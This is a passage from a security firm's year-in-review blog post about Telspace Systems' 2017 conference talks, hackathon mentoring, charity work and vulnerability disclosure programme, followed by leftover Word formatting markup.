x-small;">Left to right: Stieler (Standard Bank), Bongani Bingwa (Carte Blanche), Simphiwe (PIC), Dino Covotsos (Telspace Systems)</span><br /><br /> Telspace has always been very close to the local infosec community and we believe in giving back. As part of this, Telspace got heavily involved in ITWeb’s first Hackathon where we provided our time to train, mentor and judge the participants. The inaugural Hackathon brought young professionals with an interest in developing their skills in Information Security together. The overall theme, “Innovation in Security”, challenged disruptive innovators to build the most secure systems possible, as well as to explore new innovative mechanisms for the industry.<br /><br />The Hackaton was a great event / initiative as it made the participants aware of the importance of information security. Telspace also took on board one of the participants from the Hackathon that demonstrated the most passion, as we always like to say, we can teach you skills but we can’t teach you passion!<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-XVBv6n1LD24nPqpL3GDpK4BcKta8Jkb9p4y8Zb6vL1PZNtGS3XRQ6Y8eqcCyAe5gxm00irAWEjZ_34Nx5RQt0HA02j1hlcVhf5LPQLElWgcbBZjTBpRWBBLa39ox3m87bYaKVGYFyVs/s1600/2.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3-XVBv6n1LD24nPqpL3GDpK4BcKta8Jkb9p4y8Zb6vL1PZNtGS3XRQ6Y8eqcCyAe5gxm00irAWEjZ_34Nx5RQt0HA02j1hlcVhf5LPQLElWgcbBZjTBpRWBBLa39ox3m87bYaKVGYFyVs/s400/2.png" /></a><br /><span style="font-size: x-small;">Left to right: Manny Corregedor (COO of Telspace Systems), Nithen Naidoo (CEO of Snode) at the Hackathon Ideathon</span><br /><br />For more information on the Hackathon go to:<br /><ul>
<li><a href="https://www.itweb.co.za/content/lP3gQ2qGr8LMnRD1">https://www.itweb.co.za/content/lP3gQ2qGr8LMnRD1</a> </li>
<li><a href="http://v2.itweb.co.za/event/itweb/security-summit-2017/?page=hackathon">http://v2.itweb.co.za/event/itweb/security-summit-2017/?page=hackathon</a> </li>
<li><a href="https://www.itweb.co.za/content/p6GxRKqYe6qb3Wjr">https://www.itweb.co.za/content/p6GxRKqYe6qb3Wjr</a></li>
</ul>
In addition to supporting the ITWeb Hackathon we also sponsored, provided training (ethical and wireless hacking) and spoke at the ITWeb Security Summit. We also got the opportunity to catchup with some old friends such as Jayson Street, an international speaker, that gave a keynote at the conference. We also made a donation to CANSA for every Telspace shirt that was given away to attendees that visited our stand.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1mo2BZO_zAZCGg4uK3POHXtVWt4Rhz6GenwSBGFhMbZIYsJG5ngHovHqNGeUr8r4xnVqUmbQab7yq4VpOg3WrSqEXQTAbiYCJu_8d2_crwO7Hz2z-o3xZL6FLAewd1RuvpHIIsmwlhF_0/s1600/3.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1mo2BZO_zAZCGg4uK3POHXtVWt4Rhz6GenwSBGFhMbZIYsJG5ngHovHqNGeUr8r4xnVqUmbQab7yq4VpOg3WrSqEXQTAbiYCJu_8d2_crwO7Hz2z-o3xZL6FLAewd1RuvpHIIsmwlhF_0/s640/3.png" /></a><br /><span style="font-size: x-small;">Left to right: Eric Lundberg, Manny Corregedor and Jayson Street</span><br /><br /><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkDP8Yy_M9bLdyvsAKcW7rf9vwKT6UTp3I6P-TQ6jX7WQXb4zRYpnenunpvz2JMJ6KhrOdkLVptOcBnxR9_cif-GAe3mcsPIr9_vLQUZtTNYy1dVj6TIi3d7XqDKsZVAFCtgp2YQ5Y6n1D/s640/4.png" /><br /><span style="font-size: x-small;">Manny Corregedor giving a talk on ‘A false sense of information security’ at the ITWeb Security Summit. </span><br /><br />The conference was well attended and had great international speakers such Jayson Street and Mati Aharoni who gave keynotes.<br /><br />Telspace also attended the first local Johannesburg 0xCon conference where our COO Manny Corregedor presented his talk “Breaking AVs for fun and the greater good”. A great day was had by everyone and it was great seeing the community come together for this local conference.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeNHwFnreeGgt-Ek6lNEd8RkcnvREhBOX2AB-frwpzbijFGb9n1-LBudfqpnIvhhSQFFgXg6kCeD4RDfaNQtwpuzDuRUq8mu0bvS3Y-3got5yLl-hl7qGyBfZFLr4xM-GQhnRBGqvzP3Kz/s1600/5.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeNHwFnreeGgt-Ek6lNEd8RkcnvREhBOX2AB-frwpzbijFGb9n1-LBudfqpnIvhhSQFFgXg6kCeD4RDfaNQtwpuzDuRUq8mu0bvS3Y-3got5yLl-hl7qGyBfZFLr4xM-GQhnRBGqvzP3Kz/s640/5.png" /></a><br /><span style="font-size: x-small;">Left to right (front): Manny, Mariska (No longer with Telspace), Sibusiso, Mark, Richard. Back: Eric.</span><br /><br />Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.<br /><br />In addition to supporting local events, we also attended Blackhat, Defcon 25 and Bsides in Las Vegas. Our analyst Richard Hocking gave a presentation on Hacking Stock Markets at BSides Las Vegas titled ‘(In)Outsider Trading - Hacking stocks using public information and influence.’<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaobigqr8pKczjv4e55X5QIZ3pmiDFR49IWMQ60LeHbUfYMPZSVKsxKmPfCiIiABPsfr0AepqXjxZKT3l9M3Cng3_pWbmU2WgjpZcrBu6zK5-JsGTgpr9D70w1XrD09bLv1zp32YpxE2Qu/s1600/6.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaobigqr8pKczjv4e55X5QIZ3pmiDFR49IWMQ60LeHbUfYMPZSVKsxKmPfCiIiABPsfr0AepqXjxZKT3l9M3Cng3_pWbmU2WgjpZcrBu6zK5-JsGTgpr9D70w1XrD09bLv1zp32YpxE2Qu/s640/6.png" /></a><br />In Vegas many bonds were made and many beers were enjoyed. We look forward to attending again in 2018. We also donated to the fantastic Hackers for Charity, which is an amazing initiative which we fully support (Thanks Johnny!). More information on this great initiative can be found by going to: <a href="http://www.hackersforcharity.org/">http://www.hackersforcharity.org/</a> .<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVwiTcdFkJVwcsyfATvBdDq84zB4G_u1Mqab-RkHV8nz4SbZpn47CKX1PV_RZ596rDekLCKQ4oHleEOeuLOsl8wqV0mYrOAp21ExMfWjoVLbUiwSY2iYNHQQiQ9gn3rm6eArvtMfh8S971/s1600/7.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVwiTcdFkJVwcsyfATvBdDq84zB4G_u1Mqab-RkHV8nz4SbZpn47CKX1PV_RZ596rDekLCKQ4oHleEOeuLOsl8wqV0mYrOAp21ExMfWjoVLbUiwSY2iYNHQQiQ9gn3rm6eArvtMfh8S971/s640/7.png" /></a><br />Telspace also sponsored and presented at Bsides Cape Town 2017, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG). Our analyst Frank Allenby also presented his talk titled ‘Breach huffing; a culinary exploration of data breaches’.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivqKhSw1ljMO_-O5kbBhK2OUj5i9-uGlrN77of3u4T-YxnvXVCt_h96M1L0SyCGC74P2SnY8IQqnkoFyEUD2fCGVl5BEb0R9naxJ78U1c7ctU_YR2SazTyeSdLQcEq4niTa84sFC8Jjxrr/s1600/8.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivqKhSw1ljMO_-O5kbBhK2OUj5i9-uGlrN77of3u4T-YxnvXVCt_h96M1L0SyCGC74P2SnY8IQqnkoFyEUD2fCGVl5BEb0R9naxJ78U1c7ctU_YR2SazTyeSdLQcEq4niTa84sFC8Jjxrr/s640/8.png" /></a><br /><span style="font-size: x-small;">Frank Allenby speaking at Bsides Cape Town</span><br /><br />Our analyst Charlie Smith, also won the capture the flag competition at BSides Cape Town, the prize was a Google Home device, sponsored by NClose Security.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWyOWYO_amAsQEsagSFTLtbgeYJII7MCHMY11tOmarv3ypknB6_lbc91ik4QI1u1t-0nbouZidwWgzyDNG3Vqo4b9BxMmUXyONQl3MxkdomTKSuJgbz_d0A95PsjCKoPuH958qqEHiHUiO/s1600/9.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWyOWYO_amAsQEsagSFTLtbgeYJII7MCHMY11tOmarv3ypknB6_lbc91ik4QI1u1t-0nbouZidwWgzyDNG3Vqo4b9BxMmUXyONQl3MxkdomTKSuJgbz_d0A95PsjCKoPuH958qqEHiHUiO/s640/9.png" /></a><br /><span style="font-size: x-small;">Charlie Smith receiving his prize for winning the CTF at BSides Cape Town </span><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisPQB7oIQgKevutC1h5opLVS_GON3BT3FiNTQjVlHX6oiECf-lzRiGaaJcVBx3vjmDPTLe0XvQQzNilPaIVNwlK0yxgBzw76LkE7GULVzPsmE1Pj3BZ6qDxp4QNt19xv-XBk6JhNq7JDH9/s1600/10.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisPQB7oIQgKevutC1h5opLVS_GON3BT3FiNTQjVlHX6oiECf-lzRiGaaJcVBx3vjmDPTLe0XvQQzNilPaIVNwlK0yxgBzw76LkE7GULVzPsmE1Pj3BZ6qDxp4QNt19xv-XBk6JhNq7JDH9/s640/10.png" /></a><br /><span style="font-size: x-small;">Some “selfies for charity” at BSides Cape Town 2017</span><br /><br />For a complete write up on our experience at BSides Cape Town visit:<br /><br /><a href="http://blog.telspace.co.za/2017/12/flux-capacitors-charged-and-back-to.html">http://blog.telspace.co.za/2017/12/flux-capacitors-charged-and-back-to.html</a> <br /><br />This year we officially kicked off our security advisory service, Telspace Security Advisories (TSA), where we responsibly disclosed a number of unknown vulnerabilities (0day) to vendors. In 2018 we plan to continue our research in not only finding unknown vulnerabilities but also releasing research that would be valuable to our clients and more importantly the community as a whole - stay tuned :) Lastly, we would like to thank everyone who made our 2017 year so amazing, a huge thank you to our staff, clients, friends and most importantly the local Information Security community. We wish you all the best and a prosperous year for 2018. <div>
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Calibri;}
</style>
<![endif]-->
<!--StartFragment-->
<!--EndFragment--></div>
Unknownnoreply@blogger.com0